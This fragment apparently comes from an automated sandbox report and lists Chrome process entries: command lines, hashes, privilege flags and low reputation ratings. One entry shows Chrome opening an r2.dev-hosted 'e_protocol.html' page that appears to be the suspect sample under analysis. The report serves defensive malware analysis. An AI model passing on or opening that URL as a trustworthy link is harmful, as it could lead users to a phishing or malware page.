                      Reputation:low
                      Has exited:false

                      Target ID:2
                      Start time:19:38:55
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2468,i,1197394569104485626,4808394245553301997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:19:39:01
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                      No disassembly